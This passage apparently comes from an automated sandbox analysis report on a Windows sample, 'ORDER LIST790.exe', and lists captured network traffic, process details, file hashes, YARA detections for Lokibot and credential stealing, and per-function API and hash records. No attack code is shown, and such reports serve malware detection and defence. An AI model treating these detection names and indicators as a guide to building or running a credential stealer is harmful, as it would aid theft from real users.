128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,
Aug 11, 2022 05:37:29.144119978 CEST	1037	IN	Data Raw: 20 20 20 20 30 70 78 20 34 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 70 78 20 35 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 2c 0d 0a 20 Data Ascii: 0px 4px 10px rgba(0,0,0,0.15), 0px 5px 2px rgba(0,0,0,0.1), 0px 6px 30px rgba(0,0,0,0.1);}.jumbotron p { font-size: 28px; font-weight: 100;}.main { background: white; color: #234;
Aug 11, 2022 05:37:29.144170046 CEST	1039	IN	Data Raw: 6d 65 20 22 77 65 62 6d 61 73 74 65 72 22 20 61 6e 64 20 64 69 72 65 63 74 65 64 20 74 6f 20 74 68 65 20 77 65 62 73 69 74 65 27 73 20 64 6f 6d 61 69 6e 20 73 68 6f 75 6c 64 20 72 65 61 63 68 20 74 68 65 20 61 70 70 72 6f 70 72 69 61 74 65 20 70 Data Ascii: me "webmaster" and directed to the website's domain should reach the appropriate person.</p> <p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "webmaster@example.com".</p> </di
Aug 11, 2022 05:37:29.144273043 CEST	1040	IN	Data Raw: 61 72 65 20 74 68 61 74 20 6d 61 6b 65 73 20 74 68 65 20 77 65 62 73 69 74 65 20 72 75 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 49 66 20 79 6f 75 20 68 61 76 65 20 69 73 73 75 Data Ascii: are that makes the website run.</p> <p>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project. Unless you intended to visit CentOS.org, the CentOS Proj

Target ID:	0
Start time:	05:37:04
Start date:	11/08/2022
Path:	C:\Users\user\Desktop\ORDER LIST790.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ORDER LIST790.exe"
Imagebase:	0xeb0000
File size:	872960 bytes
MD5 hash:	80E4B72D26806ED5F245142166A48145
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Target ID:	4
Start time:	05:37:18
Start date:	11/08/2022
Path:	C:\Users\user\Desktop\ORDER LIST790.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ORDER LIST790.exe
Imagebase:	0xa80000
File size:	872960 bytes
MD5 hash:	80E4B72D26806ED5F245142166A48145
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000000.268189869.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Execution Graph

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	103
Total number of Limit Nodes:	7

Executed Functions

Function 018EBCC2 Relevance: 6.1, APIs: 4, Instructions: 127
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 018EBD30
GetCurrentThread.KERNEL32 ref: 018EBD6D
GetCurrentProcess.KERNEL32 ref: 018EBDAA
GetCurrentThreadId.KERNEL32 ref: 018EBE03

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 54b6a93dbe50e7c52d01780253e211df409396820861205dc6c27baf08144934
Instruction ID: 9d7fbdf370736df8d602c0f270a02587c6ab4a2fc2e5233c4f8fac484d2641a5
Opcode Fuzzy Hash: 54b6a93dbe50e7c52d01780253e211df409396820861205dc6c27baf08144934
Instruction Fuzzy Hash: 905154B09006489FDB14CFA9D948BDEBBF0AF89314F20845EE019BB761C7399944CF66

Uniqueness

Uniqueness Score: -1.00%

Function 018EBCD0 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 018EBD30
GetCurrentThread.KERNEL32 ref: 018EBD6D
GetCurrentProcess.KERNEL32 ref: 018EBDAA
GetCurrentThreadId.KERNEL32 ref: 018EBE03

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 309c8affe2dfbcea3dca2a98166afc22bb7d3756370926da4d7921b2ed8940d4
Instruction ID: dabd644c362ef7a2f15834c2ea4f296c7a68e7a8b0a7d3ca59be22b7719c7ddf
Opcode Fuzzy Hash: 309c8affe2dfbcea3dca2a98166afc22bb7d3756370926da4d7921b2ed8940d4
Instruction Fuzzy Hash: 975154B09006099FDB14CFA9D988BDEBBF0EF89314F20845AE419BB760C7359944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0586A418 Relevance: 3.8, Strings: 3, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#Wag^, xrefs: 0586A48B, 0586A4C5
$%k, xrefs: 0586A4AA
$%k, xrefs: 0586A470

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID: $%k$$%k$#Wag^
API String ID: 0-707435659
Opcode ID: 5ee411b259e9b3dcb2488acd0bcb7708a92b5130886f9dc588cad096c1a17b44
Instruction ID: 7a59062e62f9548366642c11a725d228ff65a31bdb7379b9e55797bfb50a2bdc
Opcode Fuzzy Hash: 5ee411b259e9b3dcb2488acd0bcb7708a92b5130886f9dc588cad096c1a17b44
Instruction Fuzzy Hash: 9531C235A002018FC714EB78D4596EA7BE2EF84214B04856DD915CB390EB35ED099BA1

Uniqueness

Uniqueness Score: -1.00%

Function 05862409 Relevance: 2.7, Strings: 2, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 05862456
, xrefs: 0586244F

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: ca42a8304f377cc77ae4e3f255e8227118821463be752a6c67b7709938542f7f
Instruction ID: cbde388d8d7ef8c693324ac8d68643e92d7ffb76d97958c22acd0cb57feb69ef
Opcode Fuzzy Hash: ca42a8304f377cc77ae4e3f255e8227118821463be752a6c67b7709938542f7f
Instruction Fuzzy Hash: 60616331910705CFEB00EF29D4D5655B7F5FF95304F918668E849AB32AEB71E984CB80

Uniqueness

Uniqueness Score: -1.00%

Function 05862418 Relevance: 2.6, Strings: 2, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 05862456
, xrefs: 0586244F

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: eb3bd881e698f77388021309e4b547256e2a2314d7b8631516527441bc3d7e80
Instruction ID: 59d682eab6f688a8791efe8e88282ce71782cb9657363bb42c3e25faac813b14
Opcode Fuzzy Hash: eb3bd881e698f77388021309e4b547256e2a2314d7b8631516527441bc3d7e80
Instruction Fuzzy Hash: A8617131A10705CFEB00EF29D4D9555B7F5FF96304F9186A8D849AB32AEB71E984CB80

Uniqueness

Uniqueness Score: -1.00%

Function 058620CC Relevance: 2.6, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$%k, xrefs: 05863EA5
$%k, xrefs: 05863F03

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID: $%k$$%k
API String ID: 0-1715514694
Opcode ID: 9b747eaafa78d3b12016d744ee597e778f479964e5d2b9884e47ea637e25fe35
Instruction ID: ff189b6cb51f8c950e61e3112ac65629d36ed271f2798fef27fb28901e011acd
Opcode Fuzzy Hash: 9b747eaafa78d3b12016d744ee597e778f479964e5d2b9884e47ea637e25fe35
Instruction Fuzzy Hash: C021E1323102018FD754DF2DD8845A937A2FF85725B1984BAE80ACF7A3DE74DC048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 018E99E8 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 018E9C2E

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4db870df4fb3833ff8ecfb9d2a840ade9962f54144777b9bae5a583148671f11
Instruction ID: 7b785a9b8532a02e80269536719c51eaef6398a79ff1d0d834ebc0be2e270f4f
Opcode Fuzzy Hash: 4db870df4fb3833ff8ecfb9d2a840ade9962f54144777b9bae5a583148671f11
Instruction Fuzzy Hash: 62711370A00B058FDB24DF2AD44579ABBF1BF89308F108A2DD44ADBB50DB75E905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018E5364 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018E5421

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 989d585b75b13705a6d01e55f36eda9d0b563ad76b669768cf4a4e10692370cd
Instruction ID: d9d27cd795a96373c48b19e0da6d2173f42c057c0ebf2e7b0ea9c1576036ac42
Opcode Fuzzy Hash: 989d585b75b13705a6d01e55f36eda9d0b563ad76b669768cf4a4e10692370cd
Instruction Fuzzy Hash: 7341CFB5D00618CEDB24DFA9D885BCDBBF1FF49308F20806AD419AB251DB755A4ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 018E3EA0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018E5421

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: bd3601dc64464e7604e2a782ed4f943a87e4ff3a8dad681000f3702a469af672
Instruction ID: 2d621f1dcd375bc3ec745af07967fde6aa3950db4a1e7a042933ac1cc79c20cf
Opcode Fuzzy Hash: bd3601dc64464e7604e2a782ed4f943a87e4ff3a8dad681000f3702a469af672
Instruction Fuzzy Hash: 3E41C0B5D0061C8ADB24DFA9C8847CEBBF1BF49308F20806AD409AB251DB756A49CF90

Uniqueness

Uniqueness Score: -1.00%

Function 018EC2F8 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 018EC387

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 67e31749cf02a79ef19600b556f848e9c333cf62648bfacf324d8e48d4e609e1
Instruction ID: c9f128db1c734e253e25dca1c73436173e29499d2fb801a0dddc24848bc3fe5c
Opcode Fuzzy Hash: 67e31749cf02a79ef19600b556f848e9c333cf62648bfacf324d8e48d4e609e1
Instruction Fuzzy Hash: C821D4B5D00208AFDB10CF9AD885ADEBBF4FB48320F14841AE915A7710C378AA55CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 018EC300 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 018EC387

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d72f4f68af8cefbd096ad12bc028ee73baa313bcc0ce3776fb61778b3f080bc6
Instruction ID: de5e3b5bf94f0e35fc7c5225edfb0c24f3b39def3ba8c63ae2ff0a2b8fb68a9f
Opcode Fuzzy Hash: d72f4f68af8cefbd096ad12bc028ee73baa313bcc0ce3776fb61778b3f080bc6
Instruction Fuzzy Hash: 5021C6B5D00208AFDB10CF99D885ADEBBF4EB48324F14841AE915A7750D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 018E8D50 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018E9CA9,00000800,00000000,00000000), ref: 018E9EBA

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2ed815ed2de7abdf5641e7d0f53c815df333ef4b423244704f17a1c2c34cb313
Instruction ID: 4da40e14b8e8690d8af67e55c63014e3635023679f511c9b1805fb3449c74c29
Opcode Fuzzy Hash: 2ed815ed2de7abdf5641e7d0f53c815df333ef4b423244704f17a1c2c34cb313
Instruction Fuzzy Hash: 4B11F4B2D002099FDB10CF9AD444BDEFBF4EB49324F14842AD515A7600C3B5A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 018E9E48 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018E9CA9,00000800,00000000,00000000), ref: 018E9EBA

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d8c6b69013a60cc7e8f73cc08382e9555fc8f4316db9d858fb92a8857df01233
Instruction ID: 5c0d5f6638f0b63771817c983315e7ed2037011000749ea37057ce89f4b7ef55
Opcode Fuzzy Hash: d8c6b69013a60cc7e8f73cc08382e9555fc8f4316db9d858fb92a8857df01233
Instruction Fuzzy Hash: 5911F4B6D002099FDB10CFAAD484BDEFBF4AF88324F14851ED915A7600C7B9A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 018E9BC8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 018E9C2E

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3601ceeefbb2ff84f124b5a195495bdd30a005fc8ade1973f3befe0c10de12d1
Instruction ID: 60fb88286fb888a93f307eea50d95982837b4650d81e41ecd993dd203773ae09
Opcode Fuzzy Hash: 3601ceeefbb2ff84f124b5a195495bdd30a005fc8ade1973f3befe0c10de12d1
Instruction Fuzzy Hash: 551102B2C002098FDB10DF9AC444BDEFBF4EF88324F10841AD419A7600C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0586ED80 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

~, xrefs: 0586ED88

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 79d91f43da69e625ca26fcd274df9f2d7d39d1d3bd31e60a5545bb490793426e
Instruction ID: ef22dec23463636b9ccdba9c772e417e93cd6e0ff51b5fe7f41eb80c5cbf8763
Opcode Fuzzy Hash: 79d91f43da69e625ca26fcd274df9f2d7d39d1d3bd31e60a5545bb490793426e
Instruction Fuzzy Hash: D45158307106008FDB24EF69C888B99B7F2AF89314F1485BDD946DB3A5DB35AC09CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0586A0C9 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

V, xrefs: 0586A0D5

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 8a94e0e42c05a564d22b6516dda0bf6801ec7de6152648d4c4c0b2fb817fe5e7
Instruction ID: 4d42ac638e47bcf8c55667cf16d9f4e4b01a893bdda8d64ee74cf71cf1ac0ef3
Opcode Fuzzy Hash: 8a94e0e42c05a564d22b6516dda0bf6801ec7de6152648d4c4c0b2fb817fe5e7
Instruction Fuzzy Hash: AF219375E1021A8BDF44DBB8C840AFEB7B6BF88254F54452AD905F7280EB349E058B61

Uniqueness

Uniqueness Score: -1.00%

Function 05863E48 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

$%k, xrefs: 05863EA5

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID: $%k
API String ID: 0-4023109265
Opcode ID: 56f1669170a08cdff36f0e3920e3c2f327ee55503c9ab67f59589c3be99b4c9f
Instruction ID: 96bd8ee1dbc518d93fc95ee1eb21d6fe3f74de9881b8a1d60d4eeff66dad2008
Opcode Fuzzy Hash: 56f1669170a08cdff36f0e3920e3c2f327ee55503c9ab67f59589c3be99b4c9f
Instruction Fuzzy Hash: 8711C8363142018FD324DA29DC867A937A6EF85710F1884BAEC46CB766DE78DC058B90

Uniqueness

Uniqueness Score: -1.00%

Function 0586D8A8 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df45c782549516545c938775338ba068f78e6c50e70b0ec46458b329e7cf321f
Instruction ID: a987f416be7270f691bd9daabda14f3e0150899c0e5a0cbf1c04db25f44330d5
Opcode Fuzzy Hash: df45c782549516545c938775338ba068f78e6c50e70b0ec46458b329e7cf321f
Instruction Fuzzy Hash: 27621931910619CFCB14EF68C894AADB7B1FF55304F408699D94AAB265FF30AAC5CF81

Uniqueness

Uniqueness Score: -1.00%

Function 05864788 Relevance: .6, Instructions: 555COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2d22f13f0f09d10a788975128e3b73a71812c64ca97f0815e38f6aafce8506
Instruction ID: a1baa70d3269a6924174457bd3a1c075a400c15078587fdb9e290c461426ac1c
Opcode Fuzzy Hash: ee2d22f13f0f09d10a788975128e3b73a71812c64ca97f0815e38f6aafce8506
Instruction Fuzzy Hash: 9942C631E107198FCF15DF68C894AADB7B1BF89304F118699D959BB221EB30AE85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0586ED90 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc616abafa5deb2c0f6cc1c84585b83147dd7c251d73eaddf3c908f8bd96d6d
Instruction ID: 87c355ec637a11ab1aea4facb2d2e253881942a15d31fbd4d469dbe51bdf889a
Opcode Fuzzy Hash: 7dc616abafa5deb2c0f6cc1c84585b83147dd7c251d73eaddf3c908f8bd96d6d
Instruction Fuzzy Hash: 06222834A10215CFCB14DF68D884AADB7B2BF89304F1485A9E90AEB365DB31ED45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0586D898 Relevance: .4, Instructions: 419COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdcc39b3f0524360d417b21f84024887d2cd21f4386a3182b6f600a7d7934c87
Instruction ID: 5892f0d5e5b5ea2f802499935df2589814bba5c4b8f27219b8a17f26935c5889
Opcode Fuzzy Hash: cdcc39b3f0524360d417b21f84024887d2cd21f4386a3182b6f600a7d7934c87
Instruction Fuzzy Hash: 82122D31A00619CFCB15EF68C894A9DB7B1FF55305F408299D94AAB265EF30AEC5CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0586A0A4 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0b5d14ffe42f6dc14404646fd883762d6e2e385aaf584a0485f637a45e65b2
Instruction ID: f16bb0514aa49d4db7d894987e5f9285663925b0b8261917e03ad1be02a3dba5
Opcode Fuzzy Hash: 1d0b5d14ffe42f6dc14404646fd883762d6e2e385aaf584a0485f637a45e65b2
Instruction Fuzzy Hash: A591D071A01209DFCB14DFA9D848AAEBBF6FF85319F148069E845E7750DB349C05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0586A020 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1341fe42e8f8df8c92d896a5afd9446c190b8b6f14e00691be623a8fa94c61dc
Instruction ID: 48f5f25ac8bb9e5bf7ccedf145bfc426306a1148df823a2470dacaac32d9d385
Opcode Fuzzy Hash: 1341fe42e8f8df8c92d896a5afd9446c190b8b6f14e00691be623a8fa94c61dc
Instruction Fuzzy Hash: C5917E71E042598FDB14DFA8C8506EEBBB2FF89314F14816AD809EB350DB789D05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0586CCF0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c415f021b09571b13a4409ce875ea95219dfbafe83d7ad22d602f7c89ac39c9f
Instruction ID: 306550174ef3ed18aa075082d81b38533c8ab3686d90b666b675cf0c64a9a417
